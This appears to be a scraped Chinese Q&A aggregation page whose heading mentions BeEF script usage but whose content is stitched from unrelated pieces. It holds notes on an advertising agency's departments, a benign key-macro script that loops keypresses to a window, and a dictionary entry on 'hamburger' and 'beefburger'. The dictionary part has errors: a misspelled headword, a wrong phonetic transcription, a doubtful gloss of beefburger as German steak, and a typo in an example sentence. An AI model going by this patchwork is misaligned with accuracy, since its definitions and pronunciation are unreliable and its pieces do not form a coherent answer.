• 创意部门的特点在于突破人类想象的极限，开发出最具震撼力的广告作品，所以它代表着丰富的想象力（imagination）。
• 而AP部门对数据的创造性分析和运用，对消费者内心感受的敏锐洞察，对创意灵感的无比敏感，到处都闪烁着智慧（intellect）的火花。
• 由务实（practicality）、丰富的想象力（imagination）和智慧（intellect）这三种品质所构成的项目调查小组在建立消费者与商品之间的情感纽带方面显示出独特的优越性和非凡的有效性。
呵呵，我今晚才写，搜到的这些。天涯

㈨ 按键精灵后台脚本

Hwnd = Plugin.Window.MousePoint()
While true
Call Plugin.Bkgnd.KeyPress(Hwnd, 116)
Delay 1000
Call Plugin.Bkgnd.KeyPress(Hwnd, 32)
Delay 1000
Call Plugin.Bkgnd.KeyPress(Hwnd, 13)
Delay 3000
Wend

试试这个，启动的时候要把鼠标放那个窗口。

㈩ 汉堡包用英语怎么说

汉堡包的英文：hamburge、beefburger。具体释义：

1、hamburger

英文发音：[ˈhæmbɜ:gə]

中文释义：n. 汉堡包，汉堡；牛肉饼，肉饼；碎牛肉

例句：

She gave me half of her hamburger.

她把她那个汉堡包的一半给了我。

2、beefburger

英文发音：['bɛdbɝɡɚ]

中文释义：n. 德式牛排；汉堡包

例句：

Minister John Gummer decided to feed his four-year-old daughter Cordelia a beefburger in front of the cameras.

约翰噶尔马决定在摄像机面前以一个煎牛肉饼来招待他的四岁女儿考狄利娅。

(10)beef脚本使用扩展阅读

hamburger和beefburger的区别：

1、具体含义不同

hamburger是广义上的汉堡包，beefburger是狭义的汉堡包，指的是牛肉汉堡，同时，beefburger还含有牛肉、牛排的意思。

2、使用场合不同

hamburger偏口语，使用较广泛，beefburger一般见于书面语。

例句：

'Why go out for hamburger when you have steak at home?' he once remarked.

纽曼曾经说道，“如果家里有了牛排，为什么要出去找汉堡？”

It takes 634 gallons of water to proce a 150g beefburger – compare this with 143 gallons to grow the same amount of tofu.

生产150克的牛肉需要消耗634加仑的水，而同样生产150克的豆腐只需消耗143加仑的水。